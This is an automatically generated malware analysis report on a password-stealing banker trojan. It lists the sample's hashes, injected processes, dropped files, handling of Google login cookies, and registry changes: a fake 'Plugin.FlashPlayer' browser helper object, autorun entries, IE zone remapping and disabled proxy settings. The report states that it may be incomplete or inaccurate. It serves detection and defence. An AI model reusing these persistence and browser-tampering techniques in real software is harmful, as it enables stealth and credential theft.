Trojan.Win32.Agent.idyd (Kaspersky), Gen:Variant.Graftor.153398 (AdAware), Trojan-PSW.Win32.Fareit.FD, mzpefinder_pcap_file.YR, TrojanPSWFareit.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Banker, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 12cff1b8d88a499ae26d0a6618c799ed
SHA1: c97a334459acbb593ac662fe44aadc5efd2e5c2f
SHA256: 39d243f5099851f228478d69aa0758760771b6220f925d219eda68748de99d4f
SSDeep: 3072:jHrScoJ9SObJIfOB0tpmJvtk6jhWrLLByesw L99vDq0 y8Gemsfq/eBJNF7i8D6:bLSJV7SoXDm0 VGAyWv
Size: 289792 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, BorlandDelphiv30, UPolyXv05_v6
Company: no certificate found
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-PSW. Trojan program intended for stealing users passwords.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
RegSvr32.exe:744
p.exe:2008
mscorsvw.exe:172
regsvr32.exe:1024
ie.exe:1472
The Trojan injects its code into the following process(es):
wilk.exe:1700
p.exe:1536
msv.exe:1820
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process wilk.exe:1700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\gbclass.dll (7386 bytes)
%Program Files%\Internet Explorer\mswinsck.ocx (1312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ie.exe (353954 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\a.dll (16222 bytes)
The process p.exe:2008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Bactria.xs (2104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (2476 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp\Bactria.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB5.tmp (0 bytes)
The process msv.exe:1820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE[1].eot (8346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (4462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\logo_2x[1].png (3393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\DXI1ORHCpsQm3Vp6mXoaTXZ2MAKAc2x4R1uOSeegc5U[1].eot (8343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ST4Z62GB\avatar_2x[1].png (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\logo_strip_2x[1].png (4739 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (712 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (2728 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C2HNYZ3R\universal_language_settings-21[1].png (199 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (950 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (5907 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MT4NMF8J\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4PQJGD2V\ServiceLogin[1].htm (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@accounts.google[2].txt (0 bytes)
The process regsvr32.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\p.exe (2452 bytes)
%Documents and Settings%\%current user%\Application Data\wilk.exe (182 bytes)
%Documents and Settings%\%current user%\Application Data\nf.xpi (863 bytes)
%Documents and Settings%\%current user%\Application Data\msv.exe (29851 bytes)
The process ie.exe:1472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (3574 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (141 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (472 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (14 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (1270 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (830 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (16 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (1404 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (132160 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (9 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (1316 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (803 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (374 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (11 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (20 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (11 bytes)
%WinDir%\IE9_main.log (3233 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (121 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (1 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (1 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\IE9B6.tmp\IE9-support\ienrcore.exe (0 bytes)
%WinDir%\Temp\IE9B6.tmp\SQMAPI.DLL (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-neutral.Extracted.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17077.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\NrPolicy.txt (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\trustedinstaller.exe.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.17077.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\ieinfra.manifest (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support.cab (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17105.cat (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.16562.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~amd64~~8.0.7600.16385.mum (0 bytes)
%WinDir%\Temp\IE9B6.tmp\IE9-support\Microsoft-Windows-InternetExplorer-Optional-Package~31bf3856ad364e35~x86~~8.0.7601.17514.mum (0 bytes)
Registry activity
The process wilk.exe:1700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"IE.exe" = "Utilitário de Instalação do Windows Internet Explorer 9"
[HKCU\Software\VB and VBA Program Settings\ml\inst]
"inect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}" = "1"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 B7 DE EC 83 C8 17 D4 56 64 29 EB FA 20 79 C3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"0" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"internet" = "explorer C:\"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
The process RegSvr32.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 35 2C 29 3A 38 C2 B2 AC 7E 90 CA 94 90 C5 A9"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"
[HKCR\Plugin.FlashPlayer\Clsid]
"(Default)" = "{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}]
"(Default)" = "_FlashPlayer"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0]
"(Default)" = "Plugin"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\VERSION]
"(Default)" = "1.0"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}]
"(Default)" = "Plugin.FlashPlayer"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"(Default)" = "{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\ProgID]
"(Default)" = "Plugin.FlashPlayer"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\HELPDIR]
"(Default)" = "%WinDir%"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\0\win32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCR\CLSID\{5D2A4E01-0034-4B1E-A6B5-056B17BB6BD4}\InprocServer32]
"(Default)" = "%WinDir%\gbclass.dll"
[HKCR\TypeLib\{4B54B44A-8A01-4FC0-9E13-2D5E4FAC2C76}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{62FC1B77-C919-4DB7-9641-1BEB3C8A9609}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Plugin.FlashPlayer]
"(Default)" = "Plugin.FlashPlayer"
The process p.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 3C FB B6 FF 15 BC 5D 07 C4 95 CE FD 36 A0 44"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\WinRAR]
"HWID" = "7B 38 44 41 46 37 39 38 37 2D 38 44 37 43 2D 34"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The process p.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 50 33 89 74 6F 6B 82 90 3D 48 12 57 B0 9D AA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process mscorsvw.exe:172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1260000"
The process msv.exe:1820 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 06 ED B6 6C 71 90 4E B4 E2 E4 23 34 E7 4B E1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"msv.exe" = "%Documents and Settings%\%current user%\Application Data\msv.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 24 6B 6C A0 25 8B 67 76 2B 63 0F 41 7B 8F 9E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
